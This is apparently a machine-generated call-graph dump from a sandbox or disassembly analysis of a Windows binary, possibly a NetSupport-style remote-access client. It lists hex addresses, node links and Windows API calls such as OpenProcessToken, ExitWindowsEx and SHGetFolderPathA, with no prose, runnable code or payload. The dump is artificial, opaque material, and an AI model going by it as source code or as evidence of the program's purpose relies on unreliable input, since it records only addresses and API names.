1102e6d4 92675->92676 92676->92280 93350 11081bb0 92676->93350 92678 11061446 92677->92678 92679 110613f7 92677->92679 92680 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92678->92680 92679->92678 92682 11081bb0 86 API calls 92679->92682 93581 110612f0 268 API calls 4 library calls 92679->93581 92681 1102eac9 92680->92681 92681->92321 92682->92679 93582 11144bd0 92684->93582 92687 11144bd0 std::_Mutex::_Mutex 265 API calls 92688 11145947 wsprintfA 92687->92688 92689 11143230 std::_Mutex::_Mutex 8 API calls 92688->92689 92690 11145964 92689->92690 92691 11145990 92690->92691 92692 11143230 std::_Mutex::_Mutex 8 API calls 92690->92692 92693 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92691->92693 92694 11145979 92692->92694 92695 1114599c 92693->92695 92694->92691 92696 11145980 92694->92696 92695->92338 92697 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92696->92697 92698 1114598c 92697->92698 92698->92338 92700 11144df7 92699->92700 92701 11144e14 std::_Mutex::_Mutex 92700->92701 92702 11144e2e 92700->92702 92703 11144e04 92700->92703 92705 11144e25 GetModuleFileNameA 92701->92705 92704 11144bd0 std::_Mutex::_Mutex 265 API calls 92702->92704 92706 11142290 std::_Mutex::_Mutex 265 API calls 92703->92706 92708 11144e34 92704->92708 92705->92708 92707 11144e88 92706->92707 92709 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92707->92709 92708->92708 92710 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 92708->92710 92711 1102eb18 92709->92711 92710->92703 92712 11143230 92711->92712 92713 11143251 CreateFileA 92712->92713 92715 111432ee CloseHandle 92713->92715 92716 111432ce 92713->92716 92719 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92715->92719 92717 111432d2 CreateFileA 92716->92717 92718 1114330b 92716->92718 92717->92715 92717->92718 92721 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92718->92721 92720 11143307 92719->92720 92720->92350 92722 1114331a 92721->92722 92722->92350 92724 1105dd10 79 API calls 92723->92724 92725 11062d88 92724->92725 93631 11061c90 92725->93631 94414 11060f40 92738->94414 93343 11142aa8 93342->93343 93346 11142a6e 93342->93346 93344 11142290 std::_Mutex::_Mutex 265 API calls 93343->93344 93345 11142ab0 93344->93345 93345->92277 93346->93343 93347 11142a92 93346->93347 96353 11142310 267 API calls std::_Mutex::_Mutex 93347->96353 93349 11142a98 93349->92277 93351 11081bbd 93350->93351 93352 11081bc2 93350->93352 96354 11081990 IsDBCSLeadByte 93351->96354 93354 11081bcb 93352->93354 93359 11081bdf 93352->93359 96355 111646ce 85 API calls 2 library calls 93354->96355 93356 11081bd8 93356->92282 93357 11081c43 93357->92282 93358 11165797 85 API calls std::_Mutex::_Mutex 93358->93359 93359->93357 93359->93358 93361 11146450 std::_Mutex::_Mutex 21 API calls 93360->93361 93362 1102d36c 93361->93362 93363 11145320 std::_Mutex::_Mutex 90 API calls 93362->93363 93364 1102d374 93363->93364 93365 1102d3a9 GetCurrentProcess SetPriorityClass 93364->93365 93366 1102d37d InterlockedIncrement 93364->93366 93368 1102d3dd 93365->93368 93366->93365 93367 1102d38c 93366->93367 93369 11146450 std::_Mutex::_Mutex 21 API calls 93367->93369 93371 1102d3e6 SetEvent 93368->93371 93375 1102d3ed 93368->93375 93370 1102d396 93369->93370 93372 1102d3a0 Sleep 93370->93372 93371->93375 93372->93372 93373 1102d424 93374 1102d452 93373->93374 96375 1109f1d0 273 API calls std::_Mutex::_Mutex 93373->96375 96376 11028e70 584 API calls std::_Mutex::_Mutex 93374->96376 93375->93373 96373 11029370 279 API calls 2 library calls 93375->96373 93379 1102d40d 96374 110ff6c0 278 API calls 2 library calls 93379->96374 93380 1102d463 96356 11028090 SetEvent 93380->96356 93383 1102d468 93384 1102d472 93383->93384 93385 1102d47d 93383->93385 96377 110ec980 893 API calls 93384->96377 93387 1102d49a 93385->93387 93388 1102d49f 93385->93388 96378 110594a0 SetEvent 93387->96378 93390 1102d4a7 93388->93390 93391 1102d4de 93388->93391 93390->93391 93398 1102d4d3 Sleep 93390->93398 93392 11146450 std::_Mutex::_Mutex 21 API calls 93391->93392 93393 1102d4e8 93392->93393 93394 1102d4f5 93393->93394 93395 1102d526 93393->93395 93394->93393 93396 1105dd10 79 API calls 93394->93396 93397 1102d523 93395->93397 93400 1102d58a 93395->93400 93401 1102d53f 93395->93401 93399 1102d518 93396->93399 93397->93395 93397->93400 93398->93391 93399->93395 96379 1102cff0 294 API calls std::_Mutex::_Mutex 93399->96379 96382 11026f20 6 API calls std::ios_base::_Tidy 93400->96382 96357 110affa0 93401->96357 93405 1102d590 93410 1102d5af PostThreadMessageA 93405->93410 93417 1102d5cb 93405->93417 93408 1102d613 93411 1102d62d 93408->93411 93421 11146450 std::_Mutex::_Mutex 21 API calls 93408->93421 96383 1110f3a0 WaitForSingleObject 93410->96383 93414 1102d66b 93411->93414 96386 11105420 26 API calls std::_Mutex::_Mutex 93411->96386 93412 1102d5f0 96385 11059400 DeleteCriticalSection CloseHandle 93412->96385 93420 1102d681 93414->93420 93426 11075d10 842 API calls 93414->93426 93417->93408 93417->93412 96384 1110f3a0 WaitForSingleObject 93417->96384 93418 1102d56a 93503 1102d57d std::ios_base::_Tidy 93418->93503 96381 111352b0 299 API calls 5 library calls 93418->96381 93427 11146450 std::_Mutex::_Mutex 21 API calls 93420->93427 93421->93411 93424 1102d661 96387 11107b50 662 API calls std::_Mutex::_Mutex 93424->96387 93426->93420 93430 1102d68b 93427->93430 93429 1102d889 93433 1102d8a0 93429->93433 96406 1100d200 wsprintfA 93429->96406 93434 1113cc30 311 API calls 93430->93434 93431 1102d666 96388 11105ac0 347 API calls std::_Mutex::_Mutex 93431->96388 93443 1102d8c7 GetModuleFileNameA GetFileAttributesA 93433->93443 93454 1102d9e3 93433->93454 93438 1102d690 93434->93438 93439 11146450 std::_Mutex::_Mutex 21 API calls 93438->93439 93441 1102d69a 93439->93441 93440 1102d895 93442 11146450 std::_Mutex::_Mutex 21 API calls 93440->93442 93451 1102d6ae std::ios_base::_Tidy 93441->93451 96389 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 93441->96389 93442->93433 93444 1102d8ef 93443->93444 93443->93454 93446 1110f420 std::_Mutex::_Mutex 265 API calls 93444->93446 93445 11146450 std::_Mutex::_Mutex 21 API calls 93448 1102da92 93445->93448 93450 1102d8f6 93446->93450 96409 11146410 FreeLibrary 93448->96409 93449 11146450 std::_Mutex::_Mutex 21 API calls 93453 1102d6c1 93449->93453 93456 11142a60 267 API calls 93450->93456 93467 1102d918 93450->93467 93451->93449 93464 1102d6d5 std::ios_base::_Tidy 93453->93464 96390 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 93453->96390 93454->93445 93455 1102da9a 93457 1102dad6 93455->93457 93462 1102dac4 ExitWindowsEx 93455->93462 93463 1102dab4 ExitWindowsEx Sleep 93455->93463 93456->93467 93459 1102dae6 93457->93459 93460 1102dadb Sleep 93457->93460 93465 11146450 std::_Mutex::_Mutex 21 API calls 93459->93465 93460->93459 93461 1102d74f 93472 1102d760 std::ios_base::_Tidy 93461->93472 96393 1110fc70 278 API calls 2 library calls 93461->96393 93462->93457 93463->93462 93464->93461 96391 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 93464->96391 93470 11142bb0 86 API calls 93467->93470 93474 1102d93d 93470->93474 93493 1102d7d9 std::ios_base::_Tidy 93472->93493 96394 1110fc70 278 API calls 2 library calls 93472->96394 93473 11146450 std::_Mutex::_Mutex 21 API calls 93475 1102d7ec 93473->93475 93474->93454 93477 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 93474->93477 93476 1102d809 CloseHandle 93475->93476 96395 1108a570 93475->96395 93481 1102d824 93476->93481 93482 1102d82a 93476->93482 93478 11146450 std::_Mutex::_Mutex 21 API calls 93495 1102d6ff std::ios_base::_Tidy 93478->93495 93483 11162be5 _free 66 API calls 93481->93483 93482->93503 96402 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 93482->96402 93483->93482 93484 1102d800 std::ios_base::_Tidy 93484->93476 93492 1102d858 93492->93503 96404 1110fc70 278 API calls 2 library calls 93492->96404 93493->93473 93494 11162be5 _free 66 API calls 93498 1102d83c 93494->93498 93495->93461 93495->93478 96392 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 93495->96392 93498->93492 93498->93494 96403 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 93498->96403 96405 1100d4e0 FreeLibrary 93503->96405 93505->92310 93506->92314 93507->92332 93508->92335 93570 11142ad6 93569->93570 93571 11142b93 93570->93571 93576 11081a70 93570->93576 93571->92675 93573 11142afb 93574 11081a70 IsDBCSLeadByte 93573->93574 93575 11142b2b _memmove 93574->93575 93575->92675 93577 11081a7c 93576->93577 93579 11081a81 std::_Mutex::_Mutex __mbschr_l 93576->93579 93580 11081990 IsDBCSLeadByte 93577->93580 93579->93573 93580->93579 93581->92679 93583 11144bf2 93582->93583 93587 11144c09 std::_Mutex::_Mutex 93582->93587 93628 11029450 265 API calls 2 library calls 93583->93628 93586 11144d97 93588 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 93586->93588 93587->93586 93589 11144c3c GetModuleFileNameA 93587->93589 93590 11144db3 wsprintfA 93588->93590 93606 11081b40 93589->93606 93590->92687 93592 11144c51 93593 11144c61 SHGetFolderPathA 93592->93593 93605 11144d48 93592->93605 93595 11144c8e 93593->93595 93596 11144cad SHGetFolderPathA 93593->93596 93594 11142290 std::_Mutex::_Mutex 262 API calls 93594->93586 93595->93596 93599 11144c94 93595->93599 93598 11144ce2 std::_Mutex::_Mutex 93596->93598 93602 1102a620 std::_Mutex::_Mutex 145 API calls 93598->93602 93629 11029450 265 API calls 2 library calls 93599->93629 93603 11144cf3 93602->93603 93610 11144670 93603->93610 93605->93594 93608 11081b53 _strrchr 93606->93608 93607 11081b6a std::_Mutex::_Mutex 93607->93592 93608->93607 93630 11081990 IsDBCSLeadByte 93608->93630 93611 111446fa 93610->93611 93612 1114467b 93610->93612 93611->93605 93612->93611 93612->93612 93613 1114468b GetFileAttributesA 93612->93613 93614 111446a5 93613->93614 93615 11144697 93613->93615 93616 11163cf8 __strdup 66 API calls 93614->93616 93615->93605 93617 111446ac 93616->93617 93618 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 93617->93618 93619 111446b6 93618->93619 93620 111446d3 93619->93620 93621 11144670 std::_Mutex::_Mutex 67 API calls 93619->93621 93620->93605 93622 111446c6 93621->93622 93623 111446dc 93622->93623 93624 111446ce 93622->93624 93626 11162be5 _free 66 API calls 93623->93626 93625 11162be5 _free 66 API calls 93624->93625 93625->93620 93627 111446e1 CreateDirectoryA 93626->93627 93627->93620 93630->93607 93752 11144ea0 93631->93752 93633 11061d1c 93755 11144eb3 std::ios_base::_Tidy 93752->93755 93753 11144dc0 267 API calls 93753->93755 93755->93753 93756 11144f1a std::ios_base::_Tidy 93755->93756 93757 11144ed5 GetLastError 93755->93757 93860 11163fed 93755->93860 93756->93633 93757->93755 93758 11144ee0 Sleep 93757->93758 93863 11163f31 93860->93863 94418 11060e40 94414->94418 94429 11060760 94418->94429 94430 1110f420 std::_Mutex::_Mutex 265 API calls 94429->94430 94431 1106077c 94430->94431 94432 110607c5 94431->94432 94433 11060783 94431->94433 96353->93349 96354->93352 96355->93356 96356->93383 96410 110805f0 96357->96410 96362 1102d54a 96366 110eb080 96362->96366 96363 110affe7 96422 11029450 265 API calls 2 library calls 96363->96422 96367 110affa0 267 API calls 96366->96367 96368 110eb0ad 96367->96368 96438 110ea450 96368->96438 96372 1102d555 96380 110b0190 267 API calls std::_Mutex::_Mutex 96372->96380 96373->93379 96374->93373 96375->93374 96376->93380 96377->93385 96378->93388 96379->93397 96380->93418 96381->93503 96382->93405 96383->93405 96384->93417 96386->93424 96387->93431 96388->93414 96390->93464 96391->93495 96392->93495 96393->93472 96394->93493 96396 1108a617 96395->96396 96400 1108a5aa std::ios_base::_Tidy 96395->96400 96397 1108a61e DeleteCriticalSection 96396->96397 96451 1106e1b0 96397->96451 96398 1108a5be CloseHandle 96398->96400 96400->96396 96400->96398 96401 1108a644 std::ios_base::_Tidy 96401->93484 96402->93498 96403->93498 96404->93503 96405->93429 96406->93440 96409->93455 96411 11080614 96410->96411 96412 11080618 96411->96412 96413 1108062f 96411->96413 96423 11029450 265 API calls 2 library calls 96412->96423 96414 11080648 96413->96414 96415 1108062c 96413->96415 96419 110aff90 96414->96419 96415->96413 96424 11029450 265 API calls 2 library calls 96415->96424 96425 110812d0 96419->96425 96426 110812f1 96425->96426 96427 1108131d 96425->96427 96426->96427 96428 1108130b 96426->96428 96430 1108136a wsprintfA 96427->96430 96431 11081345 wsprintfA 96427->96431 96429 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96428->96429 96432 11081319 96429->96432 96437 11029450 265 API calls 2 library calls 96430->96437 96431->96427 96432->96362 96432->96363 96440 110ea45b 96438->96440 96439 110ea4f5 96448 110b0190 267 API calls std::_Mutex::_Mutex 96439->96448 96440->96439 96441 110ea47e 96440->96441 96442 110ea495 96440->96442 96449 11029450 265 API calls 2 library calls 96441->96449 96444 110ea492 96442->96444 96445 110ea4c2 SendMessageTimeoutA 96442->96445 96444->96442 96450 11029450 265 API calls 2 library calls 96444->96450 96445->96439 96448->96372 96454 1106e1c4 96451->96454 96452 1106e1c8 96452->96401 96454->96452 96455 1106d9a0 67 API calls 2 library calls 96454->96455 96455->96454 96470 11134d10 96471 11134d48 96470->96471 96472 11134d19 96470->96472 96473 11145320 std::_Mutex::_Mutex 90 API calls 96472->96473 96474 11134d1e 96473->96474 96474->96471 96475 11132bf0 274 API calls 96474->96475 96476 11134d27 96475->96476 96476->96471 96477 1105dd10 79 API calls 96476->96477 96477->96471 96478 110310c0 96479 110310ce 96478->96479 96480 11145e80 268 API calls 96479->96480 96481 110310df SetUnhandledExceptionFilter 96480->96481 96482 110310ef std::_Mutex::_Mutex 96481->96482 96483 11040860 96484 11040892 96483->96484 96485 11040898 96484->96485 96492 110408b4 96484->96492 96487 110facc0 15 API calls 96485->96487 96486 110409c8 96488 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96486->96488 96489 110408aa CloseHandle 96487->96489 96490 110409d5 96488->96490 96489->96492 96491 11040948 96505 110facc0 GetTokenInformation 96491->96505 96492->96486 96496 110408ed 96492->96496 96515 11087ee0 297 API calls 5 library calls 96492->96515 96495 1104095a 96497 11040962 CloseHandle 96495->96497 96500 11040969 96495->96500 96496->96486 96496->96491 96497->96500 96498 110409ab 96501 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96498->96501 96499 11040991 96502 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96499->96502 96500->96498 96500->96499 96503 110409c4 96501->96503 96504 110409a7 96502->96504 96506 110fad08 96505->96506 96507 110facf7 96505->96507 96516 110f1f50 9 API calls 96506->96516 96508 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96507->96508 96510 110fad04 96508->96510 96510->96495 96511 110fad2c 96511->96507 96512 110fad34 96511->96512 96513 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96512->96513 96514 110fad5a 96513->96514 96514->96495 96515->96496 96516->96511 96517 11089a40 96518 1110f6c0 ___DllMainCRTStartup 4 API calls 96517->96518 96519 11089a53 96518->96519 96521 11089a5d 96519->96521 96529 11089150 268 API calls std::_Mutex::_Mutex 96519->96529 96522 11089a84 96521->96522 96530 11089150 268 API calls std::_Mutex::_Mutex 96521->96530 96525 11089a93 96522->96525 96526 11089a10 96522->96526 96531 110896a0 96526->96531 96529->96521 96530->96522 96572 11088970 6 API calls ___DllMainCRTStartup 96531->96572 96533 110896d9 GetParent 96534 110896ec 96533->96534 96535 110896fd 96533->96535 96536 110896f0 GetParent 96534->96536 96537 11144dc0 267 API calls 96535->96537 96536->96535 96536->96536 96538 11089709 96537->96538 96539 11163fed std::_Mutex::_Mutex 143 API calls 96538->96539 96540 11089716 std::ios_base::_Tidy 96539->96540 96541 11144dc0 267 API calls 96540->96541 96542 1108972f 96541->96542 96573 11013830 22 API calls 2 library calls 96542->96573 96544 1108974a 96545 11143230 std::_Mutex::_Mutex 8 API calls 96544->96545 96548 1108978a std::ios_base::_Tidy 96545->96548 96546 110897a5 96547 11163db7 std::_Mutex::_Mutex 102 API calls 96546->96547 96550 110897c3 std::_Mutex::_Mutex 96546->96550 96547->96550 96548->96546 96549 11142290 std::_Mutex::_Mutex 265 API calls 96548->96549 96549->96546 96552 1102a620 std::_Mutex::_Mutex 145 API calls 96550->96552 96563 11089874 std::ios_base::_Tidy 96550->96563 96551 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96553 11089962 96551->96553 96554 11089813 96552->96554 96553->96525 96555 11142290 std::_Mutex::_Mutex 265 API calls 96554->96555 96556 1108981b 96555->96556 96557 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 96556->96557 96558 11089832 96557->96558 96559 11081bb0 86 API calls 96558->96559 96558->96563 96560 1108984a 96559->96560 96561 1108988e 96560->96561 96562 11089851 96560->96562 96565 11081bb0 86 API calls 96561->96565 96574 110b75d0 96562->96574 96563->96551 96567 11089899 96565->96567 96567->96563 96569 110b75d0 68 API calls 96567->96569 96568 110b75d0 68 API calls 96568->96563 96570 110898a6 96569->96570 96570->96563 96571 110b75d0 68 API calls 96570->96571 96571->96563 96572->96533 96573->96544 96577 110b75b0 96574->96577 96580 111672e3 96577->96580 96583 11167264 96580->96583 96584 11167271 96583->96584 96585 1116728b 96583->96585 96601 11169302 66 API calls __getptd_noexit 96584->96601 96585->96584 96587 11167294 GetFileAttributesA 96585->96587 96589 111672a2 GetLastError 96587->96589 96593 111672b8 96587->96593 96588 11167276 96602 111692ef 66 API calls __getptd_noexit 96588->96602 96604 11169315 66 API calls 3 library calls 96589->96604 96592 1116727d 96603 1116df04 11 API calls _xtoa_s@20 96592->96603 96597 11089857 96593->96597 96606 11169302 66 API calls __getptd_noexit 96593->96606 96595 111672ae 96605 111692ef 66 API calls __getptd_noexit 96595->96605 96597->96563 96597->96568 96599 111672cb 96607 111692ef 66 API calls __getptd_noexit 96599->96607 96601->96588 96602->96592 96603->96597 96604->96595 96605->96597 96606->96599 96607->96595 96608 111071e0 96609 111071ec 96608->96609 96610 111450a0 std::_Mutex::_Mutex 90 API calls 96609->96610 96615 1110720f 96609->96615 96612 11107201 96610->96612 96612->96615 96617 111062e0 96612->96617 96613 11107223 96616 11107218 96615->96616 96654 11106100 GetTickCount EnterCriticalSection GetTickCount 96615->96654 96691 11163180 96617->96691 96619 111062fb LoadLibraryA 96702 11137340 279 API calls 2 library calls 96619->96702 96621 11106361 96622 11106365 96621->96622 96623 1110637d 96621->96623 96622->96623 96625 1110636a 96622->96625 96624 111450a0 std::_Mutex::_Mutex 90 API calls 96623->96624 96626 11106386 96624->96626 96627 11106375 96625->96627 96628 1110636e FreeLibrary 96625->96628 96629 111063a1 LoadLibraryA GetProcAddress 96626->96629 96630 11106397 96626->96630 96632 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96627->96632 96628->96627 96631 111064d1 SetLastError 96629->96631 96636 11106443 96629->96636 96630->96629 96640 1110660f 96631->96640 96633 11106665 96632->96633 96633->96615 96634 111450a0 std::_Mutex::_Mutex 90 API calls 96635 11106624 96634->96635 96637 11106635 FreeLibrary 96635->96637 96638 1110663c 96635->96638 96636->96640 96641 111064f2 OpenProcess 96636->96641 96652 11106497 96636->96652 96692 11025d00 96636->96692 96637->96638 96638->96627 96639 11106640 FreeLibrary 96638->96639 96639->96627 96640->96634 96641->96636 96641->96652 96642 111064a5 GetProcAddress 96644 111064de SetLastError 96642->96644 96642->96652 96644->96652 96645 111065e5 CloseHandle 96645->96640 96645->96652 96646 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 96646->96652 96647 11081bb0 86 API calls 96647->96652 96648 11106556 OpenProcessToken 96648->96645 96648->96652 96649 11106574 GetTokenInformation 96650 111065d8 CloseHandle 96649->96650 96649->96652 96650->96645 96651 11106100 281 API calls 96651->96652 96652->96636 96652->96640 96652->96641 96652->96642 96652->96645 96652->96646 96652->96647 96652->96648 96652->96649 96652->96650 96652->96651 96703 110f5e90 25 API calls std::_Mutex::_Mutex 96652->96703 96655 11106153 96654->96655 96656 11106148 96654->96656 96658 11106172 96655->96658 96659 111061ca GetTickCount LeaveCriticalSection 96655->96659 96657 11146450 std::_Mutex::_Mutex 21 API calls 96656->96657 96657->96655 96662 11106190 GetTickCount LeaveCriticalSection 96658->96662 96704 11029450 265 API calls 2 library calls 96658->96704 96660 111061f0 EnterCriticalSection 96659->96660 96661 111061e2 96659->96661 96668 11106219 96660->96668 96663 11146450 std::_Mutex::_Mutex 21 API calls 96661->96663 96665 111061a8 96662->96665 96670 111061b3 96662->96670 96667 111061ed 96663->96667 96666 11146450 std::_Mutex::_Mutex 21 API calls 96665->96666 96666->96670 96667->96660 96671 11106223 96668->96671 96672 11106244 96668->96672 96670->96613 96673 111062be LeaveCriticalSection 96671->96673 96674 1110622e 96671->96674 96675 1110f420 std::_Mutex::_Mutex 265 API calls 96672->96675 96673->96613 96705 11029450 265 API calls 2 library calls 96674->96705 96676 1110624e 96675->96676 96678 11106267 96676->96678 96706 110f0cf0 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 96676->96706 96682 11106274 96678->96682 96683 1110628b 96678->96683 96681 111062bb 96681->96673 96707 11029450 265 API calls 2 library calls 96682->96707 96708 110ebfb0 268 API calls 4 library calls 96683->96708 96687 111062a0 96709 11148f50 67 API calls std::ios_base::_Tidy 96687->96709 96689 111062af 96690 11146450 std::_Mutex::_Mutex 21 API calls 96689->96690 96690->96681 96691->96619 96693 11025d0e GetProcAddress 96692->96693 96694 11025d1f 96692->96694 96693->96694 96695 11025d38 96694->96695 96696 11025d2c K32GetProcessImageFileNameA 96694->96696 96698 11025d3e GetProcAddress 96695->96698 96699 11025d4f 96695->96699 96696->96695 96697 11025d71 96696->96697 96697->96652 96698->96699 96700 11025d56 96699->96700 96701 11025d67 SetLastError 96699->96701 96700->96652 96701->96697 96702->96621 96703->96652 96706->96678 96708->96687 96709->96689 96710 6c775ae6 96711 6c775af6 96710->96711 96712 6c775af1 ___security_init_cookie 96710->96712 96715 6c7759f0 96711->96715 96712->96711 96714 6c775b04 96716 6c7759fc __commit 96715->96716 96717 6c775a99 __commit 96716->96717 96720 6c775a49 96716->96720 96723 6c77588c 96716->96723 96717->96714 96719 6c77588c __CRT_INIT@12 139 API calls 96719->96717 96720->96717 96721 6c77588c __CRT_INIT@12 139 API calls 96720->96721 96722 6c775a79 96720->96722 96721->96722 96722->96717 96722->96719 96724 6c775898 __commit 96723->96724 96725 6c7758a0 96724->96725 96726 6c77591a 96724->96726 96775 6c77607f HeapCreate 96725->96775 96728 6c775920 96726->96728 96729 6c77597b 96726->96729 96733 6c77593e 96728->96733 96742 6c7758a9 __commit 96728->96742 96794 6c775e35 62 API calls _doexit 96728->96794 96730 6c775980 96729->96730 96731 6c7759d9 96729->96731 96776 6c776da9 TlsGetValue 96730->96776 96731->96742 96800 6c7770ad 75 API calls __freefls@4 96731->96800 96732 6c7758a5 96735 6c7758b0 96732->96735 96732->96742 96738 6c775952 96733->96738 96795 6c779b09 63 API calls _free 96733->96795 96785 6c777127 80 API calls 4 library calls 96735->96785 96798 6c775965 66 API calls __mtterm 96738->96798 96742->96720 96743 6c7758b5 __RTC_Initialize 96753 6c7758c5 GetCommandLineA 96743->96753 96768 6c7758b9 96743->96768 96747 6c775948 96796 6c776dfa 66 API calls _free 96747->96796 96748 6c77599d DecodePointer 96754 6c7759b2 96748->96754 96751 6c7758be 96751->96742 96752 6c77594d 96797 6c77609d HeapDestroy 96752->96797 96787 6c77f016 68 API calls _free 96753->96787 96757 6c7759b6 96754->96757 96758 6c7759cd 96754->96758 96799 6c776e37 62 API calls 4 library calls 96757->96799 96761 6c771bfd _free 62 API calls 96758->96761 96759 6c7758d5 96788 6c7798c4 69 API calls __calloc_crt 96759->96788 96761->96742 96763 6c7759bd GetCurrentThreadId 96763->96742 96764 6c7758df 96773 6c7758e3 96764->96773 96790 6c77ef5b 85 API calls 2 library calls 96764->96790 96767 6c7758ef 96769 6c775903 96767->96769 96791 6c77ecd4 83 API calls 6 library calls 96767->96791 96786 6c77609d HeapDestroy 96768->96786 96769->96751 96793 6c779b09 63 API calls _free 96769->96793 96772 6c7758f8 96772->96769 96792 6c775c32 74 API calls 4 library calls 96772->96792 96789 6c776dfa 66 API calls _free 96773->96789 96775->96732 96777 6c776dbe DecodePointer TlsSetValue 96776->96777 96778 6c775985 96776->96778 96777->96778 96779 6c77d3f5 96778->96779 96781 6c77d3fe 96779->96781 96780 6c77a082 __calloc_crt 61 API calls 96780->96781 96781->96780 96782 6c775991 96781->96782 96783 6c77d41c Sleep 96781->96783 96782->96742 96782->96748 96784 6c77d431 96783->96784 96784->96781 96784->96782 96785->96743 96786->96751 96787->96759 96788->96764 96789->96768 96790->96767 96791->96772 96792->96769 96793->96773 96794->96733 96795->96747 96796->96752 96797->96738 96798->96742 96799->96763 96800->96742 96801 110173f0 GetTickCount 96808 11017300 96801->96808 96806 11146450 std::_Mutex::_Mutex 21 API calls 96807 11017437 96806->96807 96809 11017320 96808->96809 96810 110173d6 96808->96810 96812 11017342 CoInitialize _GetRawWMIStringW 96809->96812 96815 11017339 WaitForSingleObject 96809->96815 96811 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96810->96811 96814 110173e5 96811->96814 96813 110173c2 96812->96813 96817 11017375 96812->96817 96813->96810 96816 110173d0 CoUninitialize 96813->96816 96821 11017220 96814->96821 96815->96812 96816->96810 96817->96813 96818 110173bc 96817->96818 96820 11163a2d std::_Mutex::_Mutex 79 API calls 96817->96820 96834 11163837 67 API calls __fassign 96818->96834 96820->96817 96822 11017240 96821->96822 96829 110172e6 96821->96829 96823 11017258 CoInitialize _GetRawWMIStringW 96822->96823 96825 1101724f WaitForSingleObject 96822->96825 96826 110172d2 96823->96826 96830 1101728b 96823->96830 96824 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96827 110172f5 SetEvent GetTickCount 96824->96827 96825->96823 96828 110172e0 CoUninitialize 96826->96828 96826->96829 96827->96806 96828->96829 96829->96824 96830->96826 96831 110172cc 96830->96831 96833 11163a2d std::_Mutex::_Mutex 79 API calls 96830->96833 96835 11163837 67 API calls __fassign 96831->96835 96833->96830 96834->96813 96835->96826 96836 f21020 GetCommandLineA 96838 f21035 GetStartupInfoA 96836->96838 96839 f21090 GetModuleHandleA 96838->96839 96840 f2108b 96838->96840 96843 f21000 _NSMClient32 96839->96843 96840->96839 96842 f210a2 ExitProcess 96843->96842 96844 11025cd0 LoadLibraryA 96845 1113cd60 96846 1113cd69 96845->96846 96847 1113cd6e 96845->96847 96849 11139090 96846->96849 96850 111390d2 96849->96850 96851 111390c7 GetCurrentThreadId 96849->96851 96852 111390e0 96850->96852 96983 11029330 96850->96983 96851->96850 96990 11133920 96852->96990 96858 111391d1 96864 11139202 FindWindowA 96858->96864 96868 1113929a 96858->96868 96859 1113975a 96860 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 96859->96860 96862 11139772 96860->96862 96862->96847 96863 1113911c IsWindow IsWindowVisible 96865 11146450 std::_Mutex::_Mutex 21 API calls 96863->96865 96866 11139217 IsWindowVisible 96864->96866 96864->96868 96870 11139147 96865->96870 96867 1113921e 96866->96867 96866->96868 96867->96868 96875 11138c30 392 API calls 96867->96875 96869 111392bf 96868->96869 96871 1105dd10 79 API calls 96868->96871 96872 11139470 96869->96872 96876 1105dd10 79 API calls 96869->96876 96873 1105dd10 79 API calls 96870->96873 96894 111392e7 96871->96894 96874 1113948a 96872->96874 96878 11138c30 392 API calls 96872->96878 96877 11139163 IsWindowVisible 96873->96877 96880 111394a7 96874->96880 97226 1106b860 298 API calls 96874->97226 96879 1113923f IsWindowVisible 96875->96879 96881 1113945f 96876->96881 96877->96858 96882 11139171 96877->96882 96878->96874 96879->96868 96883 1113924e IsIconic 96879->96883 97227 1112ce90 12 API calls 2 library calls 96880->97227 96881->96872 96886 11139464 96881->96886 96882->96858 96887 11139179 